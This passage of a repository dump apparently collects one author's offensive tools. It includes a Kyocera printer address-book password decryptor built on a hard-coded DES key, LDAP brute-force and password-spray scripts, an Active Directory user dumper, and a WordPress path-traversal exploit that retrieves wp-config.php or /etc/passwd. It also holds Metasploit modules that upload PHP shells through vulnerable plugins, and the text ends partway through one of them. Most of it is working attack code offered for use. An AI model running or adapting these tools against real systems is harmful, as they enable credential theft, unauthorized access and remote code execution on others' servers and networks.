[[ "$FILESIZE" -gt "0" && "$FILESIZE" -le "3145728" ]]; 65 | then 66 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 67 | suffix="_small_straight.magcracked" 68 | seperator="_" 69 | cracked_file=$OutputFolder$wordlist$suffix 70 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 71 | ProfileSmall 72 | elif [[ "$FILESIZE" -gt "3145728" && "$FILESIZE" -le "314572800" ]]; 73 | then 74 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 75 | suffix="_medium_straight.magcracked" 76 | seperator="_" 77 | cracked_file=$OutputFolder$wordlist$suffix 78 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 79 | ProfileMedium 80 | elif [[ "$FILESIZE" -gt "314572800" && "$FILESIZE" -le "3145728000" ]]; 81 | then 82 | wordlist=$(basename "$currentWordlist" | sed 's/\(.*\)\..*/\1/') 83 | suffix="_large_straight.magcracked" 84 | seperator="_" 85 | cracked_file=$OutputFolder$wordlist$suffix 86 | ./hashcat -m "$HashType" -w 3 --remove "$HashesFile" "$currentWordlist" -r "$RULE" -o "$cracked_file" -O 87 | ProfileLarge 88 | else 89 | echo "Seems $currentWordlist is too large" 90 | fi 91 | done 92 | -------------------------------------------------------------------------------- /kyocera/KyoceraAddressBookDecryptor.cs: -------------------------------------------------------------------------------- 1 | /* 2 | Exploiting printers to gain foothold on a domain. 3 | Kyocera Comes with a pre-bundled Key and IV 4 | This utility seeks to create a threat model around the weak encryption and misconfiguration of features for abuse 5 | Tested via: 6 | - Kyocera ECOSYS M2640idw 7 | - Kyocera 4550i 8 | It obeys : RFC2898 9 | Author: Alien-within 10 | */ 11 | using System; 12 | using System.Collections; 13 | using System.Collections.Generic; 14 | using System.Diagnostics; 15 | using System.Security; 16 | using System.Security.Cryptography; 17 | using System.Text; 18 | using System.IO; 19 | using System.Linq; 20 | ​ 21 | public class Alienwithin 22 | { 23 | public static void Main(string[] args) 24 | { 25 | System.Console.WriteLine("#################################################"); 26 | System.Console.WriteLine(" Kyocera AddressBook SMB Password Decryptor "); 27 | System.Console.WriteLine(" By Alien-Within "); 28 | System.Console.WriteLine("#################################################"); 29 | Console.WriteLine("Enter the value of SmbLoginPasswd field : "); 30 | string KyoceraSMBPass = Console.ReadLine(); 31 | try 32 | { 33 | DESCryptoServiceProvider AlienwithinDESProvider = new DESCryptoServiceProvider(); 34 | AlienwithinDESProvider.Mode = CipherMode.CBC; 35 | AlienwithinDESProvider.Padding = PaddingMode.None; 36 | var key = new byte[] { 0x41, 0xF4, 0xA3, 0x05, 0xF3, 0x8B, 0x46, 0x8F }; 37 | var iv = new byte[] { 0x01, 0x82, 0x0D, 0x0B, 0x38, 0x3E, 0xCB, 0x7C }; 38 | var data = StringToByteArray(KyoceraSMBPass.Trim()); 39 | 40 | MemoryStream AlienwithinMemoryStream = new MemoryStream(); 41 | 42 | CryptoStream CStream = new CryptoStream(AlienwithinMemoryStream, AlienwithinDESProvider.CreateDecryptor(key, iv), CryptoStreamMode.Write); 43 | CStream.Write(data, 0, data.Length); 44 | CStream.FlushFinalBlock(); 45 | Console.WriteLine(Encoding.Default.GetString(AlienwithinMemoryStream.ToArray())); 46 | 47 | } 48 | catch (Exception ex) 49 | { 50 | Console.WriteLine(ex.ToString()); 51 | } 52 | } 53 | public static byte[] StringToByteArray(string hex) { 54 | return Enumerable.Range(0, hex.Length) 55 | .Where(x => x % 2 == 0) 56 | .Select(x => Convert.ToByte(hex.Substring(x, 2), 16)) 57 | .ToArray(); 58 | } 59 | } 60 | -------------------------------------------------------------------------------- /kyocera/KyoceraAddressBookDecryptor.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/kyocera/KyoceraAddressBookDecryptor.exe -------------------------------------------------------------------------------- /kyocera/Readme.md: -------------------------------------------------------------------------------- 1 | ### Exploiting Printers (Kyocera) 2 | This script would assisst in a pentest scenario to abuse a printer feature found in Kyocera printers to gain access to windows credentials. 3 | Kyocera Printers contain an address book feature; within this feature an administrator can use one of two methods to transmit scanned documents: 4 | - Configure a send to e-mail. 5 | - Configure a windows account to login to the host and scan to an SMB folder. 6 | 7 | Tested on: 8 | - Kyocera ECOSYS M2640idw 9 | - Kyocera 4550i 10 | 11 | ## Setup 12 | Quite simple really you can compile with the **csc.exe** utility in your dotnet framework. 13 | - Navigate 14 | ` KyoceraAddressBookDecryptor.cs` 15 | 16 | an example is below: 17 | `C:\Windows\Microsoft.NET\Framework64\v3.5\csc.exe KyoceraAddressBookDecryptor.cs` 18 | 19 | You also need to download [KNetViewer](https://www.kyoceradocumentsolutions.eu/en/products/software/kyocera-net-viewer.html) to be able to export the addressbook from the printer as it is the Network management tool for Kyocera Printers to perform maintenance operations on local and remote printers. 20 | 21 | [Pre-compiled binary](https://github.com/alienwithin/Scripts-Sploits/blob/master/kyocera/KyoceraAddressBookDecryptor.exe?raw=true) for the decryptor provided just incase you're pressed for time. :-P 22 | 23 | ## usage 24 | - Navigate to the path where you have saved this exe 25 | - run `KyoceraAddressBookDecryptor.exe` 26 | - paste the encrypted value from the SmbLoginPasswd field in the Address Book XML. 27 | 28 | A sample of the address book is below: 29 | 30 | ![Address Book Sample](https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/master/kyocera/printer_xml_address_book.PNG) 31 | 32 | The decryption process is as easy as below: 33 | 34 | ![Using The Decryptor](https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/master/kyocera/usage_sample.PNG) 35 | 36 | ## Presumed Threat Model 37 | 38 | ![Sample Threat Model](https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/master/kyocera/workflow.PNG) 39 | 40 | ## End 41 | -------------------------------------------------------------------------------- /kyocera/printer_xml_address_book.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/kyocera/printer_xml_address_book.PNG -------------------------------------------------------------------------------- /kyocera/usage_sample.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/kyocera/usage_sample.PNG -------------------------------------------------------------------------------- /kyocera/workflow.PNG: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/alienwithin/Scripts-Sploits/5c9fc60858725b27b3000bca47cbbcb9a0e0b058/kyocera/workflow.PNG -------------------------------------------------------------------------------- /ldap/bruteforce_interface.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | @version 1.0.0 9 | @url : https://www.alien-within.com 10 | **/ 11 | error_reporting(0); 12 | $ldapconfig['host'] = 'LDAP_Server_IP e.g 172.x.x.x'; 13 | $ldapconfig['port'] = 'LDAP PORT eg. 389'; 14 | $ds=ldap_connect($ldapconfig['host'], $ldapconfig['port']); 15 | 16 | ldap_set_option($ds, LDAP_OPT_PROTOCOL_VERSION, 3); 17 | ldap_set_option($ds, LDAP_OPT_REFERRALS, 0); 18 | ldap_set_option($ds, LDAP_OPT_NETWORK_TIMEOUT, 10); 19 | 20 | $username = $_POST['username']; 21 | $password = $_POST['password']; 22 | if(isset($_POST['username'])){ 23 | if ($bind=ldap_bind($ds, $username, $password)) { 24 | echo("Login correct"); 25 | } else { 26 | 27 | echo "Login Failed: Please check your username or password"; 28 | } 29 | } 30 | ?> 31 | 32 | 33 | 34 | 35 | 36 | 37 |
38 | 39 | 40 | 41 |
42 | 43 | -------------------------------------------------------------------------------- /ldap/ldap_dump_users.php: -------------------------------------------------------------------------------- 1 | 7 | 8 | @version 1.0.0 9 | @url : https://www.alien-within.com 10 | **/ 11 | 12 | /* 13 | Basic Settings to setup to Connect 14 | - Hostname - IP of the LDAP Server 15 | - Domain name 16 | - ldap columns and alternative connection parameters 17 | - domain admin user and password to connect and bind with 18 | - base dn for users in the organization 19 | */ 20 | $ldap_hostname = "LDAP_Server_IP e.g 172.x.x.x"; 21 | $ldap_domain = "DOMAIN NAME e.g. EXAMPLE.COM"; 22 | $ldap_columns = NULL; 23 | $ldap_connection = NULL; 24 | $ldap_password = 'DOMAIN ADMIN PASSWORD'; 25 | $ldap_username = 'DOMAIN ADMIN USER'.$ldap_domain; 26 | $ldap_base_dn = "CN=Users,DC=EXAMPLE,DC=COM"; 27 | 28 | /* 29 | End Basic Settings to setup to Connect 30 | */ 31 | //------------------------------------------------------------------------------ 32 | // Connect to the LDAP server. 33 | //------------------------------------------------------------------------------ 34 | $ldap_connection = ldap_connect($ldap_hostname); 35 | if (FALSE === $ldap_connection){ 36 | die("

Failed to connect to the LDAP server: ". $ldap_hostname ."

"); 37 | } 38 | 39 | ldap_set_option($ldap_connection, LDAP_OPT_PROTOCOL_VERSION, 3) or die('Unable to set LDAP protocol version'); 40 | ldap_set_option($ldap_connection, LDAP_OPT_REFERRALS, 0); // We need this for doing an LDAP search. 41 | 42 | if (TRUE !== ldap_bind($ldap_connection, $ldap_username, $ldap_password)){ 43 | die('

Failed to bind to LDAP server.

'); 44 | } 45 | 46 | //------------------------------------------------------------------------------ 47 | // Get a list of all Active Directory users. 48 | //------------------------------------------------------------------------------ 49 | 50 | $search_filter = "(&(objectCategory=person))"; 51 | $result = ldap_search($ldap_connection, $ldap_base_dn, $search_filter); 52 | 53 | if (FALSE !== $result){ 54 | $entries = ldap_get_entries($ldap_connection, $result); 55 | if ($entries['count'] > 0){ 56 | $odd = 0; 57 | foreach ($entries[0] AS $key => $value){ 58 | if (0 === $odd%2){ 59 | $ldap_columns[] = $key; 60 | } 61 | $odd++; 62 | } 63 | 64 | echo ''; 65 | echo ''; 66 | $header_count = 0; 67 | foreach ($ldap_columns AS $col_name){ 68 | if (0 === $header_count++){ 69 | echo ''; 76 | } 77 | echo ''; 78 | for ($i = 0; $i < $entries['count']; $i++){ 79 | echo ''; 80 | $td_count = 0; 81 | foreach ($ldap_columns AS $col_name){ 82 | if (0 === $td_count++){ 83 | echo ''; 96 | } 97 | } 98 | echo ''; 99 | } 100 | echo '
'; 70 | }else if (count($ldap_columns) === $header_count){ 71 | echo ''; 72 | }else{ 73 | echo ''; 74 | } 75 | echo $col_name .'
'; 84 | }else{ 85 | echo ''; 86 | } 87 | if (isset($entries[$i][$col_name])){ 88 | $output = NULL; 89 | if ('lastlogon' === $col_name || 'lastlogontimestamp' === $col_name){ 90 | //$output = date('D M d, Y @ H:i:s', ($entries[$i][$col_name][0] / 10000000) - 11676009600); // Windows 91 | $output = date('D M d, Y @ H:i:s', ($entries[$i][$col_name][0] / 10000000) - 11644473600); // Linux 92 | }else{ 93 | $output = $entries[$i][$col_name][0]; 94 | } 95 | echo $output .'
'; 101 | } 102 | } 103 | ldap_unbind($ldap_connection); // Clean up after ourselves. 104 | ?> 105 | -------------------------------------------------------------------------------- /ldap/love_thy_script_ldap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | __author__ = "Munir Njiru" 3 | __email__ = "munir@alien-within.com" 4 | __status__ = "Production" 5 | 6 | #LDAP password spray tool 7 | import requests 8 | import sys 9 | import warnings 10 | from requests.packages.urllib3.exceptions import InsecureRequestWarning 11 | requests.packages.urllib3.disable_warnings(InsecureRequestWarning) 12 | ''' 13 | Basic Settings for the script: 14 | - url - location of the uploaded script to bruteforce 15 | - expression - failed login message 16 | - domain - Domain you are bruteforcing against if none or workgroup you can do \\ as the value 17 | ''' 18 | url = "URL to victim location of LDAP Bruteforce SCRIPT" 19 | expression = "Login Failed: Please check your username or password" 20 | domain= "Enter the Domain to attack followed by two backslashes e.g. VICTIM\\" 21 | ''' 22 | End of basic settings you can ignore below this point 23 | ''' 24 | def brute(username,password): 25 | data = {'username':domain+username,'password':password} 26 | r = requests.post(url,data=data, verify=False) 27 | if expression not in r.content : 28 | print "\n[+] The password is: ",password, "For the User: ",username 29 | result_file=open("results_brute_ldap_common.txt","a") 30 | account_found = username+":"+password+"\n" 31 | result_file.write(account_found) 32 | result_file.close() 33 | #sys.exit() - only uncomment this line if the script should stop on first successful login 34 | else: 35 | print str(password)+" is not a correct password for "+str(username) 36 | 37 | 38 | 39 | 40 | def main(): 41 | # change dictionary names to dictionaries of your choice for user and password. 42 | words = [w.strip() for w in open("uniq_pass.txt", "rb").readlines()] 43 | for payload in words: 44 | usernames_file = [u.strip() for u in open("uniq_users.txt", "rb").readlines()] 45 | for eachuser in usernames_file: 46 | brute(eachuser,payload) 47 | 48 | 49 | if __name__ == '__main__': 50 | main() -------------------------------------------------------------------------------- /membership-simplified-for-oap-members-only-exploit.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import string 3 | import random 4 | from urlparse import urlparse 5 | 6 | print "---------------------------------------------------------------------" 7 | print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187" 8 | print "---------------------------------------------------------------------" 9 | victim = raw_input("Please Enter victim host e.g. http://example.com: ") 10 | file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n") 11 | if file_choice == "1": 12 | payload="..././..././..././wp-config.php" 13 | elif file_choice == "2": 14 | payload="..././..././..././..././..././..././..././..././etc/passwd" 15 | else: 16 | print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit" 17 | quit() 18 | slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload 19 | target=victim+slug 20 | def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits): 21 | return ''.join(random.choice(chars) for _ in range(size)) 22 | 23 | def checkPlugin(): 24 | pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php") 25 | pluginExistence = pluginExists.status_code 26 | if pluginExistence == 200: 27 | print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..." 28 | exploit() 29 | else: 30 | print "Target has a funny code & might not be vulnerable, I will now exit\n" 31 | quit() 32 | 33 | def exploit(): 34 | 35 | getThatFile = requests.get(target) 36 | fileState = getThatFile.status_code 37 | breakApart=urlparse(victim) 38 | extract_hostname=breakApart.netloc 39 | randomDifferentiator=randomizeFile() 40 | cleanName=str(randomDifferentiator) 41 | if fileState == 200: 42 | respFromThatFile = getThatFile.text 43 | if file_choice == "1": 44 | resultFile=extract_hostname+"_config_"+cleanName+".txt" 45 | print resultFile 46 | pwned=open(resultFile, 'w') 47 | pwned.write(respFromThatFile) 48 | pwned.close 49 | print "Wordpress Config Written to "+resultFile 50 | else: 51 | resultFile=extract_hostname+"_passwd"+cleanName+".txt" 52 | pwned=open(resultFile, 'w') 53 | pwned.write(respFromThatFile) 54 | pwned.close 55 | print "Passwd File Written to "+resultFile 56 | else: 57 | print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState 58 | 59 | if __name__ == "__main__": 60 | checkPlugin() 61 | -------------------------------------------------------------------------------- /metasploit_modules/Readme.md: -------------------------------------------------------------------------------- 1 | This section contains metasploit Ports for exploits for yes it is easier to just do stuff with msf. 2 | 3 | >> * [mobile_app_native.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/mobile_app_native.rb) - Zen App Mobile Native <=3.0 (CVE-2017-6104) 4 | >> * [wp_webapp_builder.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/wp_webapp_builder.rb) - Wordpress Plugin webapp-builder v2.0 (CVE-2017-1002002) 5 | >> * [wp2android_file_upload.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/wp2android_file_upload.rb) - Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4 CVE-2017-1002003) 6 | >> * [mobileapp_builder_by_wappress.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/mobileapp_builder_by_wappress.rb) - Wordpress Plugin mobile-app-builder-by-wappress v1.05 CVE-2017-1002001) 7 | >> * [wp_easytouch_builder.rb](https://github.com/alienwithin/Scripts-Sploits/blob/master/metasploit_modules/wp_easytouch_builder.rb) - Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 (CVE-2017-1002000) 8 | -------------------------------------------------------------------------------- /metasploit_modules/mobile_app_native.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | require 'msf/core' 6 | class MetasploitModule < Msf::Exploit::Remote 7 | Rank = ExcellentRanking 8 | include Msf::Exploit::Remote::HTTP::Wordpress 9 | include Msf::Exploit::FileDropper 10 | def initialize(info = {}) 11 | super(update_info(info, 12 | 'Name' => 'WordPress Mobile App Native Remote File Upload Exploit', 13 | 'Description' => ' 14 | This module exploits an arbitrary PHP code upload vulnerability in the 15 | WordPress Mobile App Native <= 3.0. 16 | The vulnerability allows for arbitrary file upload and remote code execution. 17 | ', 18 | 'Author' => 19 | [ 20 | 'Larry W. Cashdollar', # Vulnerability discovery 21 | 'Munir Njiru ' # Metasploit module 22 | ], 23 | 'License' => MSF_LICENSE, 24 | 'References' => 25 | [ 26 | ['CVE', '2017-6104'], 27 | %w(EDB 41540), 28 | %w(WPVDB 8743), 29 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 30 | ], 31 | 'Privileged' => false, 32 | 'Platform' => 'php', 33 | 'Arch' => ARCH_PHP, 34 | 'Targets' => [['Mobile App Native <= 3.0', {}]], 35 | 'DisclosureDate' => 'Feb 28 2017', 36 | 'DefaultTarget' => 0) 37 | ) 38 | end 39 | 40 | def check 41 | peer = "#{rhost}:#{rport}" 42 | uri = normalize_uri(target_uri.path) 43 | uri << '/' if uri[-1, 1] != '/' 44 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'zen-mobile-app-native', 'server', 'images.php')) 45 | return Exploit::CheckCode::Appears if checkScript && checkScript.code == 200 46 | Exploit::CheckCode::Safe 47 | end 48 | 49 | def exploit 50 | peer = "#{rhost}:#{rport}" 51 | uri = normalize_uri(target_uri.path) 52 | p = payload.encoded 53 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 54 | data = Rex::MIME::Message.new 55 | data.add_part( 56 | "", 57 | 'multipart/form-data', 58 | nil, 59 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 60 | ) 61 | print_status("Uploading payload (#{p.length} bytes)...") 62 | res = send_request_cgi('method' => 'POST', 63 | 'uri' => normalize_uri(wordpress_url_plugins, 'zen-mobile-app-native', 'server', 'images.php'), 64 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 65 | 'data' => data.to_s) 66 | unless res 67 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 68 | return 69 | end 70 | respShell = res.body 71 | respShell['http://example.com/server/images/'] = '' 72 | @shellLoc = normalize_uri(wordpress_url_plugins, 'zen-mobile-app-native', 'server', 'images', respShell.strip) 73 | print_status("Requesting #{@shellLoc}") 74 | res = send_request_cgi('uri' => @shellLoc) 75 | handler 76 | print_error('Payload failed to upload') if res && res.code == 404 77 | end 78 | end 79 | -------------------------------------------------------------------------------- /metasploit_modules/mobileapp_builder_by_wappress.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Plugin mobile-app-builder-by-wappress v1.05 Remote File Upload Exploit', 17 | 'Description' => ' 18 | This module exploits an arbitrary PHP code upload vulnerability in the 19 | WordPress Mobile App Native <= 3.0. 20 | The vulnerability allows for arbitrary file upload and remote code execution. 21 | ', 22 | 'Author' => 23 | [ 24 | 'Larry W. Cashdollar', # Vulnerability discovery 25 | 'Munir Njiru ' # Metasploit module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2017-1002001'], 31 | %w(EDB 41540), 32 | %w(WPVDB 8772), 33 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['Wordpress Plugin mobile-app-builder-by-wappress v1.05', {}]], 39 | 'DisclosureDate' => 'Mar 7 2017', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | peer = "#{rhost}:#{rport}" 46 | uri = normalize_uri(target_uri.path) 47 | uri << '/' if uri[-1, 1] != '/' 48 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'mobile-app-builder-by-wappress', 'server', 'images.php')) 49 | if checkScript && checkScript.code == 200 50 | Exploit::CheckCode::Appears 51 | end 52 | Exploit::CheckCode::Safe 53 | end 54 | 55 | def exploit 56 | peer = "#{rhost}:#{rport}" 57 | uri = normalize_uri(target_uri.path) 58 | p = payload.encoded 59 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 60 | data = Rex::MIME::Message.new 61 | data.add_part( 62 | "", 63 | 'multipart/form-data', 64 | nil, 65 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 66 | ) 67 | print_status("Uploading payload (#{p.length} bytes)...") 68 | res = send_request_cgi('method' => 'POST', 69 | 'uri' => normalize_uri(wordpress_url_plugins, 'mobile-app-builder-by-wappress', 'server', 'images.php'), 70 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 71 | 'data' => data.to_s) 72 | unless res 73 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 74 | return 75 | end 76 | respShell = res.body 77 | respShell['http://example.com/server/images/'] = '' 78 | @shellLoc = normalize_uri(wordpress_url_plugins, 'mobile-app-builder-by-wappress', 'server', 'images', respShell.strip) 79 | print_status("Requesting #{@shellLoc}") 80 | res = send_request_cgi('uri' => @shellLoc) 81 | 82 | handler 83 | 84 | print_error('Payload failed to upload') if res && res.code == 404 85 | end 86 | end 87 | -------------------------------------------------------------------------------- /metasploit_modules/wp2android_file_upload.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Plugin wp2android-turn-wp-site-into-android-app Remote File Upload Exploit', 17 | 'Description' => ' 18 | This module exploits an arbitrary PHP code upload vulnerability in the 19 | WordPress Mobile App Native <= 3.0. 20 | The vulnerability allows for arbitrary file upload and remote code execution. 21 | ', 22 | 'Author' => 23 | [ 24 | 'Larry W. Cashdollar', # Vulnerability discovery 25 | 'Munir Njiru ' # Metasploit module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2017-1002003'], 31 | %w(EDB 41540), 32 | %w(WPVDB 8774), 33 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['Wordpress Plugin wp2android-turn-wp-site-into-android-app v1.1.4', {}]], 39 | 'DisclosureDate' => 'Mar 7 2017', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | peer = "#{rhost}:#{rport}" 46 | uri = normalize_uri(target_uri.path) 47 | uri << '/' if uri[-1, 1] != '/' 48 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'wp2android-turn-wp-site-into-android-app', 'server', 'images.php')) 49 | if checkScript && checkScript.code == 200 50 | Exploit::CheckCode::Appears 51 | end 52 | Exploit::CheckCode::Safe 53 | end 54 | 55 | def exploit 56 | peer = "#{rhost}:#{rport}" 57 | uri = normalize_uri(target_uri.path) 58 | p = payload.encoded 59 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 60 | data = Rex::MIME::Message.new 61 | data.add_part( 62 | "", 63 | 'multipart/form-data', 64 | nil, 65 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 66 | ) 67 | print_status("Uploading payload (#{p.length} bytes)...") 68 | res = send_request_cgi('method' => 'POST', 69 | 'uri' => normalize_uri(wordpress_url_plugins, 'wp2android-turn-wp-site-into-android-app', 'server', 'images.php'), 70 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 71 | 'data' => data.to_s) 72 | unless res 73 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 74 | return 75 | end 76 | respShell = res.body 77 | respShell['http://example.com/server/images/'] = '' 78 | @shellLoc = normalize_uri(wordpress_url_plugins, 'wp2android-turn-wp-site-into-android-app', 'server', 'images', respShell.strip) 79 | print_status("Requesting #{@shellLoc}") 80 | res = send_request_cgi('uri' => @shellLoc) 81 | 82 | handler 83 | 84 | print_error('Payload failed to upload') if res && res.code == 404 85 | end 86 | end 87 | -------------------------------------------------------------------------------- /metasploit_modules/wp_easytouch_builder.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0 Remote File Upload Exploit', 17 | 'Description' => ' 18 | This module exploits an arbitrary PHP code upload vulnerability in the 19 | WordPress Mobile App Native <= 3.0. 20 | The vulnerability allows for arbitrary file upload and remote code execution. 21 | ', 22 | 'Author' => 23 | [ 24 | 'Larry W. Cashdollar', # Vulnerability discovery 25 | 'Munir Njiru ' # Metasploit module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', '2017-1002000'], 31 | %w(EDB 41540), 32 | %w(WPVDB 8771), 33 | ['URL', 'https://www.alien-within.com/wordpress-mobile-app-native-exploit/'] 34 | ], 35 | 'Privileged' => false, 36 | 'Platform' => 'php', 37 | 'Arch' => ARCH_PHP, 38 | 'Targets' => [['Wordpress Plugin mobile-friendly-app-builder-by-easytouch v3.0', {}]], 39 | 'DisclosureDate' => 'Mar 7 2017', 40 | 'DefaultTarget' => 0) 41 | ) 42 | end 43 | 44 | def check 45 | peer = "#{rhost}:#{rport}" 46 | uri = normalize_uri(target_uri.path) 47 | uri << '/' if uri[-1, 1] != '/' 48 | checkScript = send_request_raw('uri' => normalize_uri(wordpress_url_plugins, 'mobile-friendly-app-builder-by-easytouch', 'server', 'images.php')) 49 | return Exploit::CheckCode::Appears if checkScript && checkScript.code == 200 50 | Exploit::CheckCode::Safe 51 | end 52 | 53 | def exploit 54 | peer = "#{rhost}:#{rport}" 55 | uri = normalize_uri(target_uri.path) 56 | p = payload.encoded 57 | shellName = 'alien' + rand_text_alpha(4 + rand(4)) + '.php' 58 | data = Rex::MIME::Message.new 59 | data.add_part( 60 | "", 61 | 'multipart/form-data', 62 | nil, 63 | "form-data; name=\"file\"; filename=\"#{shellName}\"" 64 | ) 65 | print_status("Uploading payload (#{p.length} bytes)...") 66 | res = send_request_cgi('method' => 'POST', 67 | 'uri' => normalize_uri(wordpress_url_plugins, 'mobile-friendly-app-builder-by-easytouch', 'server', 'images.php'), 68 | 'ctype' => "multipart/form-data; boundary=#{data.bound}", 69 | 'data' => data.to_s) 70 | unless res 71 | print_error('Hi perpetrator, it seems the victim has a defiant gene') 72 | return 73 | end 74 | respShell = res.body 75 | respShell['http://example.com/server/images/'] = '' 76 | @shellLoc = normalize_uri(wordpress_url_plugins, 'mobile-friendly-app-builder-by-easytouch', 'server', 'images', respShell.strip) 77 | print_status("Requesting #{@shellLoc}") 78 | res = send_request_cgi('uri' => @shellLoc) 79 | 80 | handler 81 | 82 | print_error('Payload failed to upload') if res && res.code == 404 83 | end 84 | end 85 | -------------------------------------------------------------------------------- /metasploit_modules/wp_webapp_builder.rb: -------------------------------------------------------------------------------- 1 | ## 2 | # This module requires Metasploit: http://metasploit.com/download 3 | # Current source: https://github.com/rapid7/metasploit-framework 4 | ## 5 | 6 | require 'msf/core' 7 | 8 | class MetasploitModule < Msf::Exploit::Remote 9 | Rank = ExcellentRanking 10 | 11 | include Msf::Exploit::Remote::HTTP::Wordpress 12 | include Msf::Exploit::FileDropper 13 | 14 | def initialize(info = {}) 15 | super(update_info(info, 16 | 'Name' => 'Wordpress Plugin webapp-builder v2.0 Remote File Upload Exploit', 17 | 'Description' => ' 18 | This module exploits an arbitrary PHP code upload vulnerability in the 19 | WordPress Mobile App Native <= 3.0. 20 | The vulnerability allows for arbitrary file upload and remote code execution. 21 | ', 22 | 'Author' => 23 | [ 24 | 'Larry W. Cashdollar', # Vulnerability discovery 25 | 'Munir Njiru ' # Metasploit module 26 | ], 27 | 'License' => MSF_LICENSE, 28 | 'References' => 29 | [ 30 | ['CVE', 